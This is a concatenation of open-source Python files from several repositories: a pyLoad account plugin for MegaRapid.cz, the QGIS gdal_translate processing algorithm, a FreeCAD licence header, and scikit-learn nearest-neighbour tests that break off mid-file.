# -*- coding: utf-8 -*- import re import time from module.plugins.internal.Account import Account class MegaRapidCz(Account): __name__ = "MegaRapidCz" __type__ = "account" __version__ = "0.38" __status__ = "testing" __description__ = """MegaRapid.cz account plugin""" __license__ = "GPLv3" __authors__ = [("MikyWoW", "mikywow@seznam.cz"), ("zoidberg", "zoidberg@mujmail.cz")] login_timeout = 60 LIMITDL_PATTERN = ur'<td>Max. počet paralelních stahování: </td><td>(\d+)' VALID_UNTIL_PATTERN = ur'<td>Paušální stahování aktivní. Vyprší </td><td><strong>(.*?)</strong>' TRAFFIC_LEFT_PATTERN = r'<tr><td>Kredit</td><td>(.*?) GiB' def grab_info(self, user, password, data, req): htmll = self.load("http://megarapid.cz/mujucet/") m = re.search(self.LIMITDL_PATTERN, htmll) if m: data = self.get_data(user) data['options']['limitDL'] = [int(m.group(1))] m = re.search(self.VALID_UNTIL_PATTERN, htmll) if m: validuntil = time.mktime(time.strptime(m.group(1), "%d.%m.%Y - %H:%M")) return {'premium': True, 'trafficleft': -1, 'validuntil': validuntil} m = re.search(self.TRAFFIC_LEFT_PATTERN, htmll) if m: trafficleft = float(m.group(1)) * (1 << 20) return {'premium': True, 'trafficleft': trafficleft, 'validuntil': -1} return {'premium': False, 'trafficleft': None, 'validuntil': None} def login(self, user, password, data, req): html = self.load("http://megarapid.cz/prihlaseni/") if "Heslo:" in html: start = html.index('id="inp_hash" name="hash" value="') html = html[start + 33:] hashes = html[0:32] html = self.load("https://megarapid.cz/prihlaseni/", post={'hash' : hashes, 'login' : user, 'pass1' : password, 'remember': 1, 'sbmt' : u"Přihlásit"})
ahuarte47/QGIS
refs/heads/master
python/plugins/processing/algs/gdal/translate.py
15
# -*- coding: utf-8 -*-

"""
***************************************************************************
    translate.py
    ---------------------
    Date                 : August 2012
    Copyright            : (C) 2012 by Victor Olaya
    Email                : volayaf at gmail dot com
***************************************************************************
*                                                                         *
*   This program is free software; you can redistribute it and/or modify  *
*   it under the terms of the GNU General Public License as published by  *
*   the Free Software Foundation; either version 2 of the License, or     *
*   (at your option) any later version.                                   *
*                                                                         *
***************************************************************************
"""

__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'

import os

from qgis.PyQt.QtGui import QIcon

from qgis.core import (QgsRasterFileWriter,
                       QgsProcessingException,
                       QgsProcessingParameterDefinition,
                       QgsProcessingParameterRasterLayer,
                       QgsProcessingParameterNumber,
                       QgsProcessingParameterBoolean,
                       QgsProcessingParameterString,
                       QgsProcessingParameterEnum,
                       QgsProcessingParameterCrs,
                       QgsProcessingParameterRasterDestination)
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils

pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]


class translate(GdalAlgorithm):
    """Processing algorithm wrapping the gdal_translate command-line tool."""

    # Parameter-name constants shared with getConsoleCommands().
    INPUT = 'INPUT'
    TARGET_CRS = 'TARGET_CRS'
    NODATA = 'NODATA'
    COPY_SUBDATASETS = 'COPY_SUBDATASETS'
    OPTIONS = 'OPTIONS'
    EXTRA = 'EXTRA'
    DATA_TYPE = 'DATA_TYPE'
    OUTPUT = 'OUTPUT'

    def __init__(self):
        super().__init__()

    def initAlgorithm(self, config=None):
        # Index 0 means "keep the input layer's data type"; the rest map
        # directly to GDAL type names passed to -ot.
        self.TYPES = [self.tr('Use Input Layer Data Type'), 'Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64', 'CInt16', 'CInt32', 'CFloat32', 'CFloat64']

        self.addParameter(QgsProcessingParameterRasterLayer(self.INPUT,
                                                            self.tr('Input layer')))
        self.addParameter(QgsProcessingParameterCrs(self.TARGET_CRS,
                                                    self.tr('Override the projection for the output file'),
                                                    defaultValue=None,
                                                    optional=True))
        self.addParameter(QgsProcessingParameterNumber(self.NODATA,
                                                       self.tr('Assign a specified nodata value to output bands'),
                                                       type=QgsProcessingParameterNumber.Double,
                                                       defaultValue=None,
                                                       optional=True))
        self.addParameter(QgsProcessingParameterBoolean(self.COPY_SUBDATASETS,
                                                        self.tr('Copy all subdatasets of this file to individual output files'),
                                                        defaultValue=False))

        options_param = QgsProcessingParameterString(self.OPTIONS,
                                                     self.tr('Additional creation options'),
                                                     defaultValue='',
                                                     optional=True)
        options_param.setFlags(options_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced)
        options_param.setMetadata({
            'widget_wrapper': {
                'class': 'processing.algs.gdal.ui.RasterOptionsWidget.RasterOptionsWidgetWrapper'}})
        self.addParameter(options_param)

        extra_param = QgsProcessingParameterString(self.EXTRA,
                                                   self.tr('Additional command-line parameters'),
                                                   defaultValue=None,
                                                   optional=True)
        extra_param.setFlags(extra_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced)
        self.addParameter(extra_param)

        dataType_param = QgsProcessingParameterEnum(self.DATA_TYPE,
                                                    self.tr('Output data type'),
                                                    self.TYPES,
                                                    allowMultiple=False,
                                                    defaultValue=0)
        dataType_param.setFlags(dataType_param.flags() | QgsProcessingParameterDefinition.FlagAdvanced)
        self.addParameter(dataType_param)

        self.addParameter(QgsProcessingParameterRasterDestination(self.OUTPUT,
                                                                  self.tr('Converted')))

    def name(self):
        return 'translate'

    def displayName(self):
        return self.tr('Translate (convert format)')

    def group(self):
        return self.tr('Raster conversion')

    def groupId(self):
        return 'rasterconversion'

    def icon(self):
        return QIcon(os.path.join(pluginPath, 'images', 'gdaltools', 'translate.png'))

    def commandName(self):
        return 'gdal_translate'

    def getConsoleCommands(self, parameters, context, feedback, executing=True):
        # Build the gdal_translate argument list from the parameter values.
        inLayer = self.parameterAsRasterLayer(parameters, self.INPUT, context)
        if inLayer is None:
            raise QgsProcessingException(self.invalidRasterError(parameters, self.INPUT))

        out = self.parameterAsOutputLayer(parameters, self.OUTPUT, context)
        self.setOutputValue(self.OUTPUT, out)

        # NODATA is optional: only read it when the caller actually set it.
        if self.NODATA in parameters and parameters[self.NODATA] is not None:
            nodata = self.parameterAsDouble(parameters, self.NODATA, context)
        else:
            nodata = None

        arguments = []
        crs = self.parameterAsCrs(parameters, self.TARGET_CRS, context)
        if crs.isValid():
            arguments.append('-a_srs')
            arguments.append(GdalUtils.gdal_crs_string(crs))

        if nodata is not None:
            arguments.append('-a_nodata')
            arguments.append(nodata)

        if self.parameterAsBoolean(parameters, self.COPY_SUBDATASETS, context):
            arguments.append('-sds')

        data_type = self.parameterAsEnum(parameters, self.DATA_TYPE, context)
        if data_type:
            # NOTE(review): flag and value are joined in one list entry
            # ('-ot Float32'); presumably escapeAndJoin handles this — verify.
            arguments.append('-ot ' + self.TYPES[data_type])

        # Output driver is chosen from the destination file extension.
        arguments.append('-of')
        arguments.append(QgsRasterFileWriter.driverForExtension(os.path.splitext(out)[1]))

        options = self.parameterAsString(parameters, self.OPTIONS, context)
        if options:
            arguments.extend(GdalUtils.parseCreationOptions(options))

        if self.EXTRA in parameters and parameters[self.EXTRA] not in (None, ''):
            extra = self.parameterAsString(parameters, self.EXTRA, context)
            arguments.append(extra)

        arguments.append(inLayer.source())
        arguments.append(out)

        return [self.commandName(), GdalUtils.escapeAndJoin(arguments)]
kkoksvik/FreeCAD
refs/heads/master
src/Mod/Drawing/Init.py
33
# FreeCAD init script of the Image module # (c) 2001 Juergen Riegel #*************************************************************************** #* (c) Juergen Riegel (juergen.riegel@web.de) 2002 * #* * #* This file is part of the FreeCAD CAx development system. * #* * #* This program is free software; you can redistribute it and/or modify * #* it under the terms of the GNU Lesser General Public License (LGPL) * #* as published by the Free Software Foundation; either version 2 of * #* the License, or (at your option) any later version. * #* for detail see the LICENCE text file. * #* * #* FreeCAD is distributed in the hope that it will be useful, * #* but WITHOUT ANY WARRANTY; without even the implied warranty of * #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * #* GNU Lesser General Public License for more details. * #* * #* You should have received a copy of the GNU Library General Public * #* License along with FreeCAD; if not, write to the Free Software * #* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * #* USA * #* * #* Juergen Riegel 2002 * #***************************************************************************/
jjx02230808/project0223
refs/heads/master
sklearn/neighbors/tests/test_neighbors.py
23
from itertools import product import pickle import numpy as np from scipy.sparse import (bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dok_matrix, lil_matrix) from sklearn import metrics from sklearn.model_selection import train_test_split from sklearn.model_selection import cross_val_score from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_equal from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_warns from sklearn.utils.testing import ignore_warnings from sklearn.utils.validation import check_random_state from sklearn.metrics.pairwise import pairwise_distances from sklearn import neighbors, datasets rng = np.random.RandomState(0) # load and shuffle iris dataset iris = datasets.load_iris() perm = rng.permutation(iris.target.size) iris.data = iris.data[perm] iris.target = iris.target[perm] # load and shuffle digits digits = datasets.load_digits() perm = rng.permutation(digits.target.size) digits.data = digits.data[perm] digits.target = digits.target[perm] SPARSE_TYPES = (bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dok_matrix, lil_matrix) SPARSE_OR_DENSE = SPARSE_TYPES + (np.asarray,) ALGORITHMS = ('ball_tree', 'brute', 'kd_tree', 'auto') P = (1, 2, 3, 4, np.inf) # Filter deprecation warnings. neighbors.kneighbors_graph = ignore_warnings(neighbors.kneighbors_graph) neighbors.radius_neighbors_graph = ignore_warnings( neighbors.radius_neighbors_graph) def _weight_func(dist): """ Weight function to replace lambda d: d ** -2. The lambda function is not valid because: if d==0 then 0^-2 is not valid. """ # Dist could be multidimensional, flatten it so all values # can be looped with np.errstate(divide='ignore'): retval = 1. 
/ dist return retval ** 2 def test_unsupervised_kneighbors(n_samples=20, n_features=5, n_query_pts=2, n_neighbors=5): # Test unsupervised neighbors methods X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for p in P: results_nodist = [] results = [] for algorithm in ALGORITHMS: neigh = neighbors.NearestNeighbors(n_neighbors=n_neighbors, algorithm=algorithm, p=p) neigh.fit(X) results_nodist.append(neigh.kneighbors(test, return_distance=False)) results.append(neigh.kneighbors(test, return_distance=True)) for i in range(len(results) - 1): assert_array_almost_equal(results_nodist[i], results[i][1]) assert_array_almost_equal(results[i][0], results[i + 1][0]) assert_array_almost_equal(results[i][1], results[i + 1][1]) def test_unsupervised_inputs(): # test the types of valid input into NearestNeighbors X = rng.random_sample((10, 3)) nbrs_fid = neighbors.NearestNeighbors(n_neighbors=1) nbrs_fid.fit(X) dist1, ind1 = nbrs_fid.kneighbors(X) nbrs = neighbors.NearestNeighbors(n_neighbors=1) for input in (nbrs_fid, neighbors.BallTree(X), neighbors.KDTree(X)): nbrs.fit(input) dist2, ind2 = nbrs.kneighbors(X) assert_array_almost_equal(dist1, dist2) assert_array_almost_equal(ind1, ind2) def test_precomputed(random_state=42): """Tests unsupervised NearestNeighbors with a distance matrix.""" # Note: smaller samples may result in spurious test success rng = np.random.RandomState(random_state) X = rng.random_sample((10, 4)) Y = rng.random_sample((3, 4)) DXX = metrics.pairwise_distances(X, metric='euclidean') DYX = metrics.pairwise_distances(Y, X, metric='euclidean') for method in ['kneighbors']: # TODO: also test radius_neighbors, but requires different assertion # As a feature matrix (n_samples by n_features) nbrs_X = neighbors.NearestNeighbors(n_neighbors=3) nbrs_X.fit(X) dist_X, ind_X = getattr(nbrs_X, method)(Y) # As a dense distance matrix (n_samples by n_samples) nbrs_D = neighbors.NearestNeighbors(n_neighbors=3, algorithm='brute', 
metric='precomputed') nbrs_D.fit(DXX) dist_D, ind_D = getattr(nbrs_D, method)(DYX) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Check auto works too nbrs_D = neighbors.NearestNeighbors(n_neighbors=3, algorithm='auto', metric='precomputed') nbrs_D.fit(DXX) dist_D, ind_D = getattr(nbrs_D, method)(DYX) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Check X=None in prediction dist_X, ind_X = getattr(nbrs_X, method)(None) dist_D, ind_D = getattr(nbrs_D, method)(None) assert_array_almost_equal(dist_X, dist_D) assert_array_almost_equal(ind_X, ind_D) # Must raise a ValueError if the matrix is not of correct shape assert_raises(ValueError, getattr(nbrs_D, method), X) target = np.arange(X.shape[0]) for Est in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): print(Est) est = Est(metric='euclidean') est.radius = est.n_neighbors = 1 pred_X = est.fit(X, target).predict(Y) est.metric = 'precomputed' pred_D = est.fit(DXX, target).predict(DYX) assert_array_almost_equal(pred_X, pred_D) def test_precomputed_cross_validation(): # Ensure array is split correctly rng = np.random.RandomState(0) X = rng.rand(20, 2) D = pairwise_distances(X, metric='euclidean') y = rng.randint(3, size=20) for Est in (neighbors.KNeighborsClassifier, neighbors.RadiusNeighborsClassifier, neighbors.KNeighborsRegressor, neighbors.RadiusNeighborsRegressor): metric_score = cross_val_score(Est(), X, y) precomp_score = cross_val_score(Est(metric='precomputed'), D, y) assert_array_equal(metric_score, precomp_score) def test_unsupervised_radius_neighbors(n_samples=20, n_features=5, n_query_pts=2, radius=0.5, random_state=0): # Test unsupervised radius-based query rng = np.random.RandomState(random_state) X = rng.rand(n_samples, n_features) test = rng.rand(n_query_pts, n_features) for p in P: results = [] for algorithm in ALGORITHMS: neigh = 
neighbors.NearestNeighbors(radius=radius, algorithm=algorithm, p=p) neigh.fit(X) ind1 = neigh.radius_neighbors(test, return_distance=False) # sort the results: this is not done automatically for # radius searches dist, ind = neigh.radius_neighbors(test, return_distance=True) for (d, i, i1) in zip(dist, ind, ind1): j = d.argsort() d[:] = d[j] i[:] = i[j] i1[:] = i1[j] results.append((dist, ind)) assert_array_almost_equal(np.concatenate(list(ind)), np.concatenate(list(ind1))) for i in range(len(results) - 1): assert_array_almost_equal(np.concatenate(list(results[i][0])), np.concatenate(list(results[i + 1][0]))), assert_array_almost_equal(np.concatenate(list(results[i][1])), np.concatenate(list(results[i + 1][1]))) def test_kneighbors_classifier(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-neighbors classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) y_str = y.astype(str) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y[:n_test_pts]) # Test prediction with y_str knn.fit(X, y_str) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y_str[:n_test_pts]) def test_kneighbors_classifier_float_labels(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-neighbors classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors) knn.fit(X, y.astype(np.float)) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) 
assert_array_equal(y_pred, y[:n_test_pts]) def test_kneighbors_classifier_predict_proba(): # Test KNeighborsClassifier.predict_proba() method X = np.array([[0, 2, 0], [0, 2, 1], [2, 0, 0], [2, 2, 0], [0, 0, 2], [0, 0, 1]]) y = np.array([4, 4, 5, 5, 1, 1]) cls = neighbors.KNeighborsClassifier(n_neighbors=3, p=1) # cityblock dist cls.fit(X, y) y_prob = cls.predict_proba(X) real_prob = np.array([[0, 2. / 3, 1. / 3], [1. / 3, 2. / 3, 0], [1. / 3, 0, 2. / 3], [0, 1. / 3, 2. / 3], [2. / 3, 1. / 3, 0], [2. / 3, 1. / 3, 0]]) assert_array_equal(real_prob, y_prob) # Check that it also works with non integer labels cls.fit(X, y.astype(str)) y_prob = cls.predict_proba(X) assert_array_equal(real_prob, y_prob) # Check that it works with weights='distance' cls = neighbors.KNeighborsClassifier( n_neighbors=2, p=1, weights='distance') cls.fit(X, y) y_prob = cls.predict_proba(np.array([[0, 2, 0], [2, 2, 2]])) real_prob = np.array([[0, 1, 0], [0, 0.4, 0.6]]) assert_array_almost_equal(real_prob, y_prob) def test_radius_neighbors_classifier(n_samples=40, n_features=5, n_test_pts=10, radius=0.5, random_state=0): # Test radius-based classification rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) y_str = y.astype(str) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: neigh = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm) neigh.fit(X, y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y[:n_test_pts]) neigh.fit(X, y_str) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_array_equal(y_pred, y_str[:n_test_pts]) def test_radius_neighbors_classifier_when_no_neighbors(): # Test radius-based classifier when no neighbors found. 
# In this case it should rise an informative exception X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.01, 2.01]]) # no outliers z2 = np.array([[1.01, 1.01], [1.4, 1.4]]) # one outlier weight_func = _weight_func for outlier_label in [0, -1, None]: for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: rnc = neighbors.RadiusNeighborsClassifier clf = rnc(radius=radius, weights=weights, algorithm=algorithm, outlier_label=outlier_label) clf.fit(X, y) assert_array_equal(np.array([1, 2]), clf.predict(z1)) if outlier_label is None: assert_raises(ValueError, clf.predict, z2) elif False: assert_array_equal(np.array([1, outlier_label]), clf.predict(z2)) def test_radius_neighbors_classifier_outlier_labeling(): # Test radius-based classifier when no neighbors found and outliers # are labeled. X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.01, 2.01]]) # no outliers z2 = np.array([[1.01, 1.01], [1.4, 1.4]]) # one outlier correct_labels1 = np.array([1, 2]) correct_labels2 = np.array([1, -1]) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: clf = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm, outlier_label=-1) clf.fit(X, y) assert_array_equal(correct_labels1, clf.predict(z1)) assert_array_equal(correct_labels2, clf.predict(z2)) def test_radius_neighbors_classifier_zero_distance(): # Test radius-based classifier, when distance to a sample is zero. 
X = np.array([[1.0, 1.0], [2.0, 2.0]]) y = np.array([1, 2]) radius = 0.1 z1 = np.array([[1.01, 1.01], [2.0, 2.0]]) correct_labels1 = np.array([1, 2]) weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: clf = neighbors.RadiusNeighborsClassifier(radius=radius, weights=weights, algorithm=algorithm) clf.fit(X, y) assert_array_equal(correct_labels1, clf.predict(z1)) def test_neighbors_regressors_zero_distance(): # Test radius-based regressor, when distance to a sample is zero. X = np.array([[1.0, 1.0], [1.0, 1.0], [2.0, 2.0], [2.5, 2.5]]) y = np.array([1.0, 1.5, 2.0, 0.0]) radius = 0.2 z = np.array([[1.1, 1.1], [2.0, 2.0]]) rnn_correct_labels = np.array([1.25, 2.0]) knn_correct_unif = np.array([1.25, 1.0]) knn_correct_dist = np.array([1.25, 2.0]) for algorithm in ALGORITHMS: # we don't test for weights=_weight_func since user will be expected # to handle zero distances themselves in the function. for weights in ['uniform', 'distance']: rnn = neighbors.RadiusNeighborsRegressor(radius=radius, weights=weights, algorithm=algorithm) rnn.fit(X, y) assert_array_almost_equal(rnn_correct_labels, rnn.predict(z)) for weights, corr_labels in zip(['uniform', 'distance'], [knn_correct_unif, knn_correct_dist]): knn = neighbors.KNeighborsRegressor(n_neighbors=2, weights=weights, algorithm=algorithm) knn.fit(X, y) assert_array_almost_equal(corr_labels, knn.predict(z)) def test_radius_neighbors_boundary_handling(): """Test whether points lying on boundary are handled consistently Also ensures that even with only one query point, an object array is returned rather than a 2d array. 
""" X = np.array([[1.5], [3.0], [3.01]]) radius = 3.0 for algorithm in ALGORITHMS: nbrs = neighbors.NearestNeighbors(radius=radius, algorithm=algorithm).fit(X) results = nbrs.radius_neighbors([[0.0]], return_distance=False) assert_equal(results.shape, (1,)) assert_equal(results.dtype, object) assert_array_equal(results[0], [0, 1]) def test_RadiusNeighborsClassifier_multioutput(): # Test k-NN classifier on multioutput data rng = check_random_state(0) n_features = 2 n_samples = 40 n_output = 3 X = rng.rand(n_samples, n_features) y = rng.randint(0, 3, (n_samples, n_output)) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) weights = [None, 'uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): # Stack single output prediction y_pred_so = [] for o in range(n_output): rnn = neighbors.RadiusNeighborsClassifier(weights=weights, algorithm=algorithm) rnn.fit(X_train, y_train[:, o]) y_pred_so.append(rnn.predict(X_test)) y_pred_so = np.vstack(y_pred_so).T assert_equal(y_pred_so.shape, y_test.shape) # Multioutput prediction rnn_mo = neighbors.RadiusNeighborsClassifier(weights=weights, algorithm=algorithm) rnn_mo.fit(X_train, y_train) y_pred_mo = rnn_mo.predict(X_test) assert_equal(y_pred_mo.shape, y_test.shape) assert_array_almost_equal(y_pred_mo, y_pred_so) def test_kneighbors_classifier_sparse(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, random_state=0): # Test k-NN classifier on sparse matrices # Like the above, but with various types of sparse matrices rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 X *= X > .2 y = ((X ** 2).sum(axis=1) < .5).astype(np.int) for sparsemat in SPARSE_TYPES: knn = neighbors.KNeighborsClassifier(n_neighbors=n_neighbors, algorithm='auto') knn.fit(sparsemat(X), y) epsilon = 1e-5 * (2 * rng.rand(1, n_features) - 1) for sparsev in SPARSE_TYPES + (np.asarray,): X_eps = sparsev(X[:n_test_pts] + epsilon) y_pred = knn.predict(X_eps) 
assert_array_equal(y_pred, y[:n_test_pts]) def test_KNeighborsClassifier_multioutput(): # Test k-NN classifier on multioutput data rng = check_random_state(0) n_features = 5 n_samples = 50 n_output = 3 X = rng.rand(n_samples, n_features) y = rng.randint(0, 3, (n_samples, n_output)) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) weights = [None, 'uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): # Stack single output prediction y_pred_so = [] y_pred_proba_so = [] for o in range(n_output): knn = neighbors.KNeighborsClassifier(weights=weights, algorithm=algorithm) knn.fit(X_train, y_train[:, o]) y_pred_so.append(knn.predict(X_test)) y_pred_proba_so.append(knn.predict_proba(X_test)) y_pred_so = np.vstack(y_pred_so).T assert_equal(y_pred_so.shape, y_test.shape) assert_equal(len(y_pred_proba_so), n_output) # Multioutput prediction knn_mo = neighbors.KNeighborsClassifier(weights=weights, algorithm=algorithm) knn_mo.fit(X_train, y_train) y_pred_mo = knn_mo.predict(X_test) assert_equal(y_pred_mo.shape, y_test.shape) assert_array_almost_equal(y_pred_mo, y_pred_so) # Check proba y_pred_proba_mo = knn_mo.predict_proba(X_test) assert_equal(len(y_pred_proba_mo), n_output) for proba_mo, proba_so in zip(y_pred_proba_mo, y_pred_proba_so): assert_array_almost_equal(proba_mo, proba_so) def test_kneighbors_regressor(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y_target = y[:n_test_pts] weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_true(np.all(abs(y_pred - 
y_target) < 0.3)) def test_KNeighborsRegressor_multioutput_uniform_weight(): # Test k-neighbors in multi-output regression with uniform weight rng = check_random_state(0) n_features = 5 n_samples = 40 n_output = 4 X = rng.rand(n_samples, n_features) y = rng.rand(n_samples, n_output) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) for algorithm, weights in product(ALGORITHMS, [None, 'uniform']): knn = neighbors.KNeighborsRegressor(weights=weights, algorithm=algorithm) knn.fit(X_train, y_train) neigh_idx = knn.kneighbors(X_test, return_distance=False) y_pred_idx = np.array([np.mean(y_train[idx], axis=0) for idx in neigh_idx]) y_pred = knn.predict(X_test) assert_equal(y_pred.shape, y_test.shape) assert_equal(y_pred_idx.shape, y_test.shape) assert_array_almost_equal(y_pred, y_pred_idx) def test_kneighbors_regressor_multioutput(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors in multi-output regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y = np.vstack([y, y]).T y_target = y[:n_test_pts] weights = ['uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) knn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = knn.predict(X[:n_test_pts] + epsilon) assert_equal(y_pred.shape, y_target.shape) assert_true(np.all(np.abs(y_pred - y_target) < 0.3)) def test_radius_neighbors_regressor(n_samples=40, n_features=3, n_test_pts=10, radius=0.5, random_state=0): # Test radius-based neighbors regression rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y_target = y[:n_test_pts] weight_func = _weight_func for algorithm in ALGORITHMS: for weights in ['uniform', 'distance', weight_func]: neigh = 
neighbors.RadiusNeighborsRegressor(radius=radius, weights=weights, algorithm=algorithm) neigh.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = neigh.predict(X[:n_test_pts] + epsilon) assert_true(np.all(abs(y_pred - y_target) < radius / 2)) def test_RadiusNeighborsRegressor_multioutput_with_uniform_weight(): # Test radius neighbors in multi-output regression (uniform weight) rng = check_random_state(0) n_features = 5 n_samples = 40 n_output = 4 X = rng.rand(n_samples, n_features) y = rng.rand(n_samples, n_output) X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0) for algorithm, weights in product(ALGORITHMS, [None, 'uniform']): rnn = neighbors. RadiusNeighborsRegressor(weights=weights, algorithm=algorithm) rnn.fit(X_train, y_train) neigh_idx = rnn.radius_neighbors(X_test, return_distance=False) y_pred_idx = np.array([np.mean(y_train[idx], axis=0) for idx in neigh_idx]) y_pred_idx = np.array(y_pred_idx) y_pred = rnn.predict(X_test) assert_equal(y_pred_idx.shape, y_test.shape) assert_equal(y_pred.shape, y_test.shape) assert_array_almost_equal(y_pred, y_pred_idx) def test_RadiusNeighborsRegressor_multioutput(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=3, random_state=0): # Test k-neighbors in multi-output regression with various weight rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = np.sqrt((X ** 2).sum(1)) y /= y.max() y = np.vstack([y, y]).T y_target = y[:n_test_pts] weights = ['uniform', 'distance', _weight_func] for algorithm, weights in product(ALGORITHMS, weights): rnn = neighbors.RadiusNeighborsRegressor(n_neighbors=n_neighbors, weights=weights, algorithm=algorithm) rnn.fit(X, y) epsilon = 1E-5 * (2 * rng.rand(1, n_features) - 1) y_pred = rnn.predict(X[:n_test_pts] + epsilon) assert_equal(y_pred.shape, y_target.shape) assert_true(np.all(np.abs(y_pred - y_target) < 0.3)) def test_kneighbors_regressor_sparse(n_samples=40, n_features=5, n_test_pts=10, n_neighbors=5, 
random_state=0): # Test radius-based regression on sparse matrices # Like the above, but with various types of sparse matrices rng = np.random.RandomState(random_state) X = 2 * rng.rand(n_samples, n_features) - 1 y = ((X ** 2).sum(axis=1) < .25).astype(np.int) for sparsemat in SPARSE_TYPES: knn = neighbors.KNeighborsRegressor(n_neighbors=n_neighbors, algorithm='auto') knn.fit(sparsemat(X), y) for sparsev in SPARSE_OR_DENSE: X2 = sparsev(X) assert_true(np.mean(knn.predict(X2).round() == y) > 0.95) def test_neighbors_iris(): # Sanity checks on the iris dataset # Puts three points of each label in the plane and performs a # nearest neighbor query on points near the decision boundary. for algorithm in ALGORITHMS: clf = neighbors.KNeighborsClassifier(n_neighbors=1, algorithm=algorithm) clf.fit(iris.data, iris.target) assert_array_equal(clf.predict(iris.data), iris.target) clf.set_params(n_neighbors=9, algorithm=algorithm) clf.fit(iris.data, iris.target) assert_true(np.mean(clf.predict(iris.data) == iris.target) > 0.95) rgs = neighbors.KNeighborsRegressor(n_neighbors=5, algorithm=algorithm) rgs.fit(iris.data, iris.target) assert_true(np.mean(rgs.predict(iris.data).round() == iris.target) > 0.95) def test_neighbors_digits(): # Sanity check on the digits dataset # the 'brute' algorithm has been observed to fail if the input # dtype is uint8 due to overflow in distance calculations. 
